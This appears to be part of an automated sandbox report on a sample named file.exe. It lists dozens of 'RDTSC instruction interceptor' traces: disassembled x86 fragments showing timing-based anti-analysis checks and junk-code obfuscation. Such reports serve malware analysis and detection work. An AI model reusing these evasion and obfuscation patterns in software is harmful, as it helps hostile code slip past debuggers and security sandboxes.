Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF429 second address: FBF4EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D207Ch], edx 0x00000011 push 00000000h 0x00000013 jmp 00007F67208644CBh 0x00000018 push 139E6A86h 0x0000001d jmp 00007F67208644D0h 0x00000022 xor dword ptr [esp], 139E6A06h 0x00000029 mov ecx, dword ptr [ebp+122D2C08h] 0x0000002f push 00000003h 0x00000031 jng 00007F67208644D2h 0x00000037 jbe 00007F67208644CCh 0x0000003d mov dword ptr [ebp+122D1BE4h], edi 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push esi 0x00000048 call 00007F67208644C8h 0x0000004d pop esi 0x0000004e mov dword ptr [esp+04h], esi 0x00000052 add dword ptr [esp+04h], 00000019h 0x0000005a inc esi 0x0000005b push esi 0x0000005c ret 0x0000005d pop esi 0x0000005e ret 0x0000005f sub dword ptr [ebp+122D1931h], ecx 0x00000065 push 00000003h 0x00000067 push 00000000h 0x00000069 push edx 0x0000006a call 00007F67208644C8h 0x0000006f pop edx 0x00000070 mov dword ptr [esp+04h], edx 0x00000074 add dword ptr [esp+04h], 00000017h 0x0000007c inc edx 0x0000007d push edx 0x0000007e ret 0x0000007f pop edx 0x00000080 ret 0x00000081 jns 00007F67208644CFh 0x00000087 push 98299581h 0x0000008c push eax 0x0000008d push edx 0x0000008e push edi 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF4EB second address: FBF4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF59C second address: FBF5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 xor dword ptr [esp], 03D8C026h 0x0000000c movzx ecx, di 0x0000000f push 00000003h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F67208644C8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d adc cx, 1781h 0x00000032 mov ecx, dword ptr [ebp+122D2B94h] 0x00000038 push 00000003h 0x0000003a sub dword ptr [ebp+122D2226h], edx 0x00000040 push 6A255765h 0x00000045 push ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF697 second address: FBF6BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533110h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F6720533118h 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F6720533106h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF6BA second address: FBF760 instructions: 0x00000000 rdtsc 0x00000002 js 00007F67208644C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D2B90h] 0x00000011 and esi, 37EC672Eh 0x00000017 push 00000000h 0x00000019 call 00007F67208644D1h 0x0000001e add edi, 56C5E22Bh 0x00000024 pop esi 0x00000025 mov ch, E6h 0x00000027 push 2ABCBCA0h 0x0000002c push eax 0x0000002d pushad 0x0000002e js 00007F67208644C6h 0x00000034 jo 00007F67208644C6h 0x0000003a popad 0x0000003b pop eax 0x0000003c xor dword ptr [esp], 2ABCBC20h 0x00000043 mov si, F574h 0x00000047 push 00000003h 0x00000049 add dx, DCA1h 0x0000004e push 00000000h 0x00000050 push 00000000h 0x00000052 push edx 0x00000053 call 00007F67208644C8h 0x00000058 pop edx 0x00000059 mov dword ptr [esp+04h], edx 0x0000005d add dword ptr [esp+04h], 0000001Dh 0x00000065 inc edx 0x00000066 push edx 0x00000067 ret 0x00000068 pop edx 0x00000069 ret 0x0000006a jbe 00007F67208644CCh 0x00000070 mov edx, dword ptr [ebp+122D2C20h] 0x00000076 push 00000003h 0x00000078 sub ecx, dword ptr [ebp+122D2B30h] 0x0000007e call 00007F67208644C9h 0x00000083 push eax 0x00000084 push edx 0x00000085 pushad 0x00000086 push esi 0x00000087 pop esi 0x00000088 pushad 0x00000089 popad 0x0000008a popad 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF760 second address: FBF796 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6720533108h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F6720533118h 0x00000014 jmp 00007F672053310Ah 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF796 second address: FBF79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF79A second address: FBF7BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533117h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF7BF second address: FBF82A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F67208644C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [eax] 0x0000000d jg 00007F67208644CEh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 jmp 00007F67208644D4h 0x0000001c pop eax 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F67208644C8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 mov dx, ax 0x0000003a lea ebx, dword ptr [ebp+1245129Dh] 0x00000040 mov dword ptr [ebp+122D317Eh], esi 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 ja 00007F67208644C8h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF82A second address: FBF842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F672053310Bh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF842 second address: FBF848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FD28AA second address: FD28AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FD28AE second address: FD28C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FB647D second address: FB6481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FDF728 second address: FDF72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FDF72E second address: FDF736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FDF87D second address: FDF881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FDF881 second address: FDF893 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c je 00007F6720533106h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FDF893 second address: FDF897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FDFB2F second address: FDFB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FDFB36 second address: FDFB3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FDFB3B second address: FDFB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6720533106h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE0079 second address: FE0080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE0080 second address: FE008B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F6720533106h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE031F second address: FE0323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FD5AFD second address: FD5B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F672053310Ah 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FD5B14 second address: FD5B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FAF921 second address: FAF927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE047E second address: FE0482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE0482 second address: FE0486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE0486 second address: FE04AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F67208644D9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE04AF second address: FE04E5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F6720533115h 0x00000010 jmp 00007F6720533112h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE0AB8 second address: FE0AE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F67208644D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE0C74 second address: FE0C8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F6720533106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F672053310Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE0C8E second address: FE0CC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D2h 0x00000007 jmp 00007F67208644CAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F67208644CBh 0x00000016 push esi 0x00000017 pop esi 0x00000018 jbe 00007F67208644C6h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE0E2D second address: FE0E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE12C3 second address: FE12C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE2A97 second address: FE2AAD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6720533106h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F6720533106h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE2AAD second address: FE2AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE2AB1 second address: FE2ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6720533111h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FB2D56 second address: FB2D8A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F67208644CCh 0x00000008 jng 00007F67208644DFh 0x0000000e jmp 00007F67208644D9h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FB2D8A second address: FB2D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6720533106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE6B99 second address: FE6B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE7E45 second address: FE7E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6720533112h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FE7E51 second address: FE7E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F67208644C6h 0x0000000a pop eax 0x0000000b jo 00007F6720864502h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F67208644D9h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FEA20D second address: FEA212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FAA712 second address: FAA716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FEDA16 second address: FEDA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FEDA1C second address: FEDA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FEDA21 second address: FEDA29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FEDA29 second address: FEDA2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FEDD44 second address: FEDD49 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FEDED5 second address: FEDEEF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F67208644D5h 0x00000008 jmp 00007F67208644CFh 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FEE1FD second address: FEE201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FEE201 second address: FEE209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FEE209 second address: FEE221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6720533111h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FEE4DC second address: FEE4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF1CD0 second address: FF1CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF1F8B second address: FF1FB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F67208644CCh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007F67208644DEh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F67208644D0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF2A46 second address: FF2A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6720533106h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF2A51 second address: FF2A6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF2BAA second address: FF2BE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F6720533112h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF2C5E second address: FF2C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF3137 second address: FF313C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF313C second address: FF3142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF3142 second address: FF3198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F6720533112h 0x0000000d nop 0x0000000e mov edi, dword ptr [ebp+122D191Bh] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F6720533108h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov esi, dword ptr [ebp+122D2B80h] 0x00000038 xchg eax, ebx 0x00000039 jo 00007F6720533114h 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF4BF6 second address: FF4C0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67208644D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF4C0E second address: FF4C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F6720533108h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov esi, 7CA45EBDh 0x0000002a or esi, dword ptr [ebp+122D2D54h] 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D2D7Bh], eax 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007F6720533108h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 0000001Bh 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 sub dword ptr [ebp+122D225Bh], ebx 0x0000005a xchg eax, ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jnc 00007F6720533106h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF4C86 second address: FF4C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF4C8C second address: FF4C9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F6720533106h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF4C9F second address: FF4CA5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF4CA5 second address: FF4CAA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF56B0 second address: FF5759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F67208644D6h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F67208644C8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a sbb di, 930Fh 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F67208644C8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b mov edi, dword ptr [ebp+122D29D8h] 0x00000051 mov si, bx 0x00000054 push 00000000h 0x00000056 mov si, D6A1h 0x0000005a xchg eax, ebx 0x0000005b push esi 0x0000005c push esi 0x0000005d pushad 0x0000005e popad 0x0000005f pop esi 0x00000060 pop esi 0x00000061 push eax 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F67208644D8h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF54B4 second address: FF54B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF5759 second address: FF575D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF54B9 second address: FF54BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF6181 second address: FF6187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF6187 second address: FF618B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF8012 second address: FF8019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FF73D7 second address: FF73DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
